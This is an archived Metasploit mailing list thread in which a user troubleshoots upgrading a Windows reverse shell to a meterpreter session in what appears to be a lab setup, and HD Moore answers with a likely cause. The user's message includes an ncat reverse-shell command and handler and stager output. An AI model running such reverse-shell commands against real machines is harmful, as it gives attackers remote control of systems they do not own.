Metasploit mailing list archives

Re: [Framework] Failed to upgrade win32 shell to meterpreter session


From: "HD Moore" <hdm () metasploit com>
Date: Mon, 4 Jun 2012 22:58:21 -0500

If the upgrade script is VBS-based and the destination system is not running
the English language pack, the bytes can get corrupted during conversion.

-----Original Message-----
From: framework-bounces () spool metasploit com
[mailto:framework-bounces () spool metasploit com] On Behalf Of Yuping Li
Sent: Monday, June 04, 2012 10:13 PM
To: framework () spool metasploit com
Subject: [framework] [Framework] Failed to upgrade win32 shell to
meterpreter session

hi,

I set up exploit/multi/handler with payload windows/shell_reverse_tcp
on a machine A(BT5R2), then on machine B(Windows XP SP3), I connect
machine A with the following command: ncat -e "cmd.exe" machine_a_ip
4444, so I get a win32 shell session. But when I run command "sessions
-u 1", I can't get a meterpreter session, even though I can see the
Command Stager progress as follows:

[*] Started reverse handler on 10.50.10.118:4444
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
.
.
.
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Command Stager progress - 100.00% done (102108/102108 bytes)

Then I check with sessions -l, there is still only 1 session (the
win32 shell), so can someone tell me what's going on?

My framework version is like this: Framework: 4.4.0-dev.15205
Console  : 4.4.0-dev.15168
There is no av on the XP sp3 box, no ips/ids between two machines.

Best Regards,
Yuping Li
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: